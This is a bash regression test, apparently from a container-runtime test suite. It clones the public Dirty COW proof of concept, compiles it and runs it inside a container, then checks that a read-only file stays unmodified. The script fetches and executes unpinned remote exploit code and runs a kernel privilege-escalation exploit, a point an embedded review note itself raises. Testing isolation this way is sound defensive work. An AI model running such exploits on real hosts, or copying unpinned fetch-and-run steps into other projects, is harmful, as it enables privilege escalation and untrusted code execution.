github.com/dmaizel/tests@v0.0.0-20210728163746-cae6a2d9cee8/pentest/dirtycow.sh (about)

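#!/bin/bash
#
# Copyright (c) 2018 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
#
# Regression test: build and run the public Dirty COW proof of concept
# inside a container started with the runtime under test, then verify that
# a read-only file in that container was NOT modified.
#
# Environment:
#   RUNTIME  container runtime passed to `docker run --runtime`
#            (default: kata-runtime)
#
# Result: exits 0 only when every setup step succeeded AND the read-only
# file is unchanged. Every setup failure aborts through die (from lib.sh),
# so a broken environment cannot be reported as "not vulnerable".

source "$(dirname "$0")/lib.sh"

container_name="dirtycow"
runtime=${RUNTIME:-kata-runtime}
test_repo="https://github.com/dirtycow/dirtycow.github.io"
test_dir="/root/dirtycow"
test_file="$test_dir/test"
test_file_content="Hello"
dirty_file_content="pwned"

# Remove the test container on every exit path.
finish() {
	docker rm -f "$container_name"
}
trap finish EXIT

# Run a gcc container. If this fails (runtime missing, stale container with
# the same name, image pull error) nothing below is meaningful, so stop here.
docker run --runtime="$runtime" --name="$container_name" -dti gcc bash \
	|| die "Could not start container $container_name with runtime $runtime"

# Turning off periodic writeback makes the exploit stable.
# This write is expected to be rejected inside a container; if it succeeds,
# the container can change kernel VM tuning and the test fails.
if docker exec "$container_name" bash -c "echo 0 > /proc/sys/vm/dirty_writeback_centisecs"; then
	die "Turned off periodic writeback"
fi

# Clone dirtycow repo.
# NOTE(review): this fetches the default branch head, so the test compiles
# and executes whatever the remote serves at run time. Pin it to a reviewed
# commit (git checkout <REVIEWED_COMMIT_SHA>, placeholder) or vendor
# dirtyc0w.c next to this script.
docker exec "$container_name" git clone "$test_repo" "$test_dir" \
	|| die "Could not clone $test_repo"

# Create the test file and make it read-only. The values are passed as
# positional parameters so they are never re-parsed as shell syntax inside
# the container.
docker exec "$container_name" bash -c \
	'printf "%s\n" "$1" > "$2" && chmod 0404 "$2"' _ \
	"$test_file_content" "$test_file" \
	|| die "Could not create read-only test file $test_file"

# Build dirtycow. Without a binary the final check would pass trivially.
docker exec -w "$test_dir" "$container_name" gcc -pthread dirtyc0w.c -o dirtyc0w \
	|| die "Could not build dirtyc0w"

# Run dirtycow. A non-zero status means the proof of concept did not run to
# completion, so an unchanged file would prove nothing.
docker exec -w "$test_dir" "$container_name" ./dirtyc0w "$test_file" "$dirty_file_content" \
	|| die "dirtyc0w did not run to completion; result is inconclusive"

# Check if test file was modified. Read the content back and compare it
# exactly: a failed read (container gone, file missing) is reported as an
# infrastructure error instead of being mistaken for "unmodified".
current_content=$(docker exec "$container_name" cat "$test_file") \
	|| die "Could not read back $test_file"
[ "$current_content" = "$test_file_content" ] || die "Modified read only file"

exit 0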